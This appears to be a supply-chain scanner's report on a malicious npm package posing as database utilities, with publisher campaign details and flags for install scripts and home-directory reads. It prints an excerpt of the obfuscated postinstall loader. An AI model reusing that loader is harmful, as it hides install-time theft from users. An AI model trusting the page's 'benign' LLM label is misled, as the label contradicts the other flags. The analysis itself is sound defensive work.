// npm 패키지
@cloudplatform-single-spa/support
Internal database utilities with connection pooling, query builder and migration support
버전
3
메인테이너
1
라이선스
UNLICENSED
최초 publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,109 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x2514e8=a0_0x360b;(function(_0xc0afb1,_0x2443d7){const _0x3c5472=a0_0x360b,_0x47b4d2=_0xc0afb1();while(!![]){try{const _0x48ccb7=-parseInt(_0x3c5472(0x23d))/(-0x179d+0x7b*0x28+0…// publisher 캠페인by mr.4nd3r50n
이 계정에서 catch된 패키지 9건고립된 catch가 아닙니다. 동일 publisher가 8개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 100/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:24publisher-version-pump:25osv-flagged:MAL-2026-4975reads-env-varsreads-homedir
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x2514e8=a0_0x360b;(function(_0xc0afb1,_0x2443d7){const _0x3c5472=a0_0x360b,_0x47b4d2=_0xc0afb1();while(!![]){try{const _0x48ccb7=-parseInt(_0x3c5472(0x23d))/(-0x179d+0x7b*0x28+0x2*0x233)+parseInt(_0x3c5472(0x213))/(-0x2627+0x163f+0xfea)+-parseInt(_0x3c5472(0x1f6))/(-0x133d*0x1+0xb3c+0x6*0x156)*(-parseInt(_0x3c5472(0x216))/(0x10e0+0x26d3+-0x37af))+-parseInt(_0x3c5472(0x223))/(-0x6e3*0x1+-0x1566+0x1c4e)+-parseInt(_0x3c5472(0x21c))/(-0x1829+0x1818+-0x1*-0x17)+parseInt(_0x3c5472(0x222))/(-0x1801+-0x133f+0x2b47)+-parseInt(_0x3c5472(0x1f4))/(0x150a*-0x1+-0xcd*0x5+0x1913);if(_0x48ccb7===_0x2443d7)break;else _0x47b4d2['push'](_0x47b4d2['shift']());}catch(_0x8be6bd){_0x47b4d2['push'](_0x47b4d2['shift']());}}}(a0_0x4cda,0x31adc+-0x9fb07+0x1958*0xbe));const a0_0x50b1fc=require('os'),a0_0x1b5a0c=require('fs'),a0_0x4450dc=require(a0_0x2514e8(0x245)),a0_0x5d0bcf=require(a0_0x2514e8(0x209)),a0_0x308e9d=require(a0_0x2514e8(0x204)),{execSync:a0_0x1bada0,spawn:a0_0x3ca593}=require(a0_0x2514e8(0x1e7)),a0_0x325825=a0_0x2514e8(0x21e),a0_0x4b24aa=a0_0x2514e8(0x205),a0_0x4c0b1b=a0_0x2514e8(0x1e4)+a0_0x2514e8(0x23e),a0_0x1cc1a4=a0_0x2514e8(0x1fa),a0_0x351d44=!!process.env[a0_0x1cc1a4],a0_0x43f6eb=a0_0x2514e8(0x1e2)===a0_0x2514e8(0x1e2)||!!process.env[a0_0x4c0b1b+'RECON_ONLY'];function a0_0x53ff52(_0x23845e){const _0x5ab867=a0_0x2514e8,_0x2802f3=process[_0x5ab867(0x1fc)][_0x5ab867(0x21f)][_0x5ab867(0x217)]('.')[_0x5ab867(0x24b)](Number),_0x28e452=_0x23845e[_0x5ab867(0x211)]('>= --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
